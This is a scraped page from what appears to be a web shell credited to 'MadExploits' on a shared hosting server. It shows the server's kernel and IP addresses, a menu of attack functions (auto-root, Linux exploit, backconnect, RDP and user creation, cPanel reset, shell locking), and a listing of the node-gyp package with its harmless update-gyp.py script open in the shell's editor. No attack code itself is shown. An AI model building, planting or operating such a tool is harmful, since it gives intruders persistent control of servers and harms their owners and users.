Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.131.37.193
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
npm /
node_modules.bundled /
node-gyp /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
gyp
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
CHANGELOG.md
89.21
KB
-rw-r--r--
CONTRIBUTING.md
1.35
KB
-rw-r--r--
LICENSE
1.08
KB
-rw-r--r--
README.md
10.49
KB
-rw-r--r--
SECURITY.md
151
B
-rw-r--r--
addon.gypi
5.3
KB
-rw-r--r--
macOS_Catalina.md
6.51
KB
-rw-r--r--
macOS_Catalina_acid_test.sh
495
B
-rw-r--r--
package.json
1.1
KB
-rw-r--r--
update-gyp.py
1.58
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update-gyp.py
#!/usr/bin/python3 import argparse import os import shutil import subprocess import tarfile import tempfile import urllib.request BASE_URL = "https://github.com/nodejs/gyp-next/archive/" CHECKOUT_PATH = os.path.dirname(os.path.realpath(__file__)) CHECKOUT_GYP_PATH = os.path.join(CHECKOUT_PATH, "gyp") parser = argparse.ArgumentParser() parser.add_argument("tag", help="gyp tag to update to") args = parser.parse_args() tar_url = BASE_URL + args.tag + ".tar.gz" changed_files = subprocess.check_output(["git", "diff", "--name-only"]).strip() if changed_files: raise Exception("Can't update gyp while you have uncommitted changes in node-gyp") with tempfile.TemporaryDirectory() as tmp_dir: tar_file = os.path.join(tmp_dir, "gyp.tar.gz") unzip_target = os.path.join(tmp_dir, "gyp") with open(tar_file, "wb") as f: print("Downloading gyp-next@" + args.tag + " into temporary directory...") print("From: " + tar_url) with urllib.request.urlopen(tar_url) as in_file: f.write(in_file.read()) print("Unzipping...") with tarfile.open(tar_file, "r:gz") as tar_ref: tar_ref.extractall(unzip_target) print("Moving to current checkout (" + CHECKOUT_PATH + ")...") if os.path.exists(CHECKOUT_GYP_PATH): shutil.rmtree(CHECKOUT_GYP_PATH) shutil.move( os.path.join(unzip_target, os.listdir(unzip_target)[0]), CHECKOUT_GYP_PATH ) subprocess.check_output(["git", "add", "gyp"], cwd=CHECKOUT_PATH) subprocess.check_output(["git", "commit", "-m", "feat(gyp): update gyp to " + args.tag])
Close